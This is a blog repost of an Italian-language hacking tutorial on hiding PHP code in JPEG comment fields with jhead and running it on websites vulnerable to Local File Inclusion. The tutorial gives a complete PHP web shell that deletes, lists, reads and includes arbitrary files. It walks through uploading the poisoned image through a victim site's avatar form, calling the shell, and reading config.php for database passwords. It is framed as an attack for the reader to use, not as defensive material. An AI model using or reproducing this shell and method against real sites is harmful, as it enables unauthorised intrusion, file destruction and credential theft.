Chinaunix首页 | 论坛 | 博客
  • 博客访问: 78937
  • 博文数量: 32
  • 博客积分: 1440
  • 博客等级: 上尉
  • 技术积分: 375
  • 用 户 组: 普通用户
  • 注册时间: 2008-06-25 16:03
文章分类

全部博文(32)

文章存档

2010年(12)

2008年(20)

我的朋友

分类: 网络与安全

2010-10-11 14:07:57

Image Code Injection with LFI

######################################################

   *Introduzione
      
     - Header Immagini
     
     - Jhead

     - Manipolazione dei commenti con jhead

     - Come sfruttare questa tecnica

     - Considerazioni finali

   *Ringraziamenti


######################################################

[1] - Introduzione

----------------------

Salve a tutti , sono RedEvil1991 , ho deciso di scrivere questo paper perchè ho trovato molto interessante questa
tecnica :  L'image Code Injection .
In questo paper vi spiegherò in cosa consiste questa tecnica , e come può essere sfruttata.





[2] - Header Immagini

----------------------

Molte persone non sanno che nelle fotografie e nelle immagini oltre alla parte grafica  , ci sono anche dei campi d'informazioni
detti header. Questi header sono presenti in tutte le immagini , essi vengono creati nel caso delle fotografie dalla macchina
fotografica o nel caso di immagini normali da programmi come Photoshop o GIMP.
Generalmente contengono informazioni come la data di creazione dell'img , il nome  , la dimensione il formato ed il commento.
Per darvi un'idea vi mostro gli header di una mia immagine:



________________________________________________________________
                                                               
File name    : C:\Users\Kevin\Desktop\avatartutorial.              
File size    : 8631 bytes                                       
File date    : 2010:04:07 17:18:19                              
Resolution   : 100 x 100                                       
Comment      : Obscure Intent Team.net //commento               
________________________________________________________________

Come potete vedere Nel campo "Commento" ho inserito gia in un primo momento , il link all'obscure team , questo vi dimostra che
possiamo modificarlo a nostro piacimento , e di conseguenza potremmo sfruttare questa tecnica inserendo degli script.




[3] - Manipolazione dei commenti con jhead

-----------------------

Ora vediamo come modificare i commenti di un'immagine , innanzitutto procuratevi il programma "jhead"; una volta scaricato
andate a posizionarlo nella directory principale dell'hard disk C:/ .
Aprite start --> esegui --> cmd  , nel prompt dei comandi dovete per prima cosa selezionare la directory dove dove è situato
jhead quindi scrivete "cd C:/"...bene ora per visualizzare gli header di un'immagine il comando è:

jhead nomeimg.jpg

Appena invierete il comando appariranno delle scritte come quelle indicate nel riquadro sopra.
Ora per modificare il commento il comando sarà :

jhead -ce nomeimg.jpg

Si aprirà il blocco note , ora noi potremo inserire del codice , per esempio un cookie grabber , una piccola shell ecc.
dopo aver scritto basterà salvare ed il gioco sarà fatto.



[4] - Come sfruttare questa tecnica

-------------------------

Sottovalutare questa tecnica è sbagliatissimo , perchè come vi mostrerò ora un'immagine con del codice hostata in un sito
può essere un mezzo con la quale è possibile attaccarlo , ma entriamo nello specifico:

Ora vi farò vedere come inserendo una piccola ed elementare shell in php sarà possibile attaccare un sito che soffre di
LFI (Local File Inclusion).

Cominciamo inserendo la shell nel commento :


_________________________________________________________________
                                                                 
if($_GET["azz"]=="distr"){                                    
    unlink($_GET["file"]);                                       
}elseif($_GET["azz"]=="list"){                           
    $myDirectory = opendir($_GET["dir"]);                       
    while($entryName = readdir($myDirectory)) {               
        $dirArray[] = $entryName;                                    }                                                            
    closedir($myDirectory);                                      
    $indexCount    = count($dirArray);                          
  Print ("$indexCount files
\n");                           
    sort($dirArray);                                             
    for($index=0; $index < $indexCount; $index++) {            
        echo $dirArray[$index] . "
";                        
    }                                                            
}elseif($_GET["azz"]=="vedi"){                                 
    echo htmlspecialchars(file_get_contents($_GET["file"]));   
}elseif($_GET["azz"]=="inc"){                                    
    include($_GET["file"]);                                      
}                                                               
?>                                                               
                                                                _________________________________________________________________


Una volta salvata non ci resta che trovare un sito buggato di LFI come ad esempio:





Ora ci serve un modulo di upload nel sito vittima (per esempio un modulo caricamento avatar presente nei forum)
ed una volta caricata la nostra immagine con la shell dovremo includerla richiamando i comandi:


&azz=list&dir=.

Bene se il sito è buggato la shell funzionerà e ci appariranno i file situati nello spazio web della vittima ,
ora potremmo sfruttare questa possibilità per leggerci il file config.php se presente nel sito per trovare le
informazioni relative al database password ecc.

sarà sufficente modificare la directory dall'url "&dir=Nome_cartella_che_si_vuole_Visualizzare"


[5] - Considerazioni finali

---------------------------

Come potete vedere questa tecnica è molto efficace , starà a voi scegliere i metodi con la quale sfruttarla.

######################################################

Vi ricordo che per chiarimenti o altre risorse mi trovate su :  http://www.obscureteam.net

un ringraziamento a Sora101.

 

文件: jhead.zip
大小: 108KB
下载: 下载

阅读(420) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~